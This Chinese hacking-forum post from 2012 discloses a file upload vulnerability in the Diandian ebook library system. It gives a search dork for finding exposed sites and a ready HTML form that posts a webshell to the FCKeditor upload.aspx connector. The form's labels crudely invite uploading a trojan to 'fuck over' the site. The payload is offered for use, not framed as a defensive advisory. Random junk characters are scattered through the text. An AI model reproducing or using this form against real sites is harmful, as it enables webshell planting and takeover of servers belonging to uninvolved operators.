找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7372|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞9 [4 r+ F0 A% p& V( e6 H: C0 A2 p. n
作者:冰锋刺客
% H  d$ b2 s$ t. o( \$ N0 S 厂商:点击书(dianjishu.com)
7 Y. G/ K8 Q& p6 g 日期:2012-6-21% r. [! O3 C+ E3 L, R
" j" `$ C4 m2 g# W" S& ?, K4 ^0 G4 a
I 概述- `, A/ s$ W6 o' U9 a7 n* J; G( D+ s
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
& M! `. i$ s9 d  Z5 i II 简介
3 p' Y& L; Q# C  y   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"/ x( T4 I  c/ h
补充一个漏洞3 K" a8 G9 t  n8 d. U# e
<form id="frmUpload" enctype="multipart/form-data"
/ b% }  a4 I: Y% j6 b# S8 V. {( L action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>( l) R* p) d4 N$ g
<input id="btnUpload" type="submit" value="操翻他">0 V6 J# X& @) D2 {1 w+ @, x
</form>
9 U% `/ w! c8 c# e 你们懂的
; O/ y' W% q1 ]; `2 p& w' D; l! q 那傻逼提供还需要改包." U' P% a; M1 Q7 \3 R
自己看了下源代码发现fckeditor
3 }# W' C$ g+ \0 H 直接秒杀
5 v7 K* u, z8 _6 t) T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表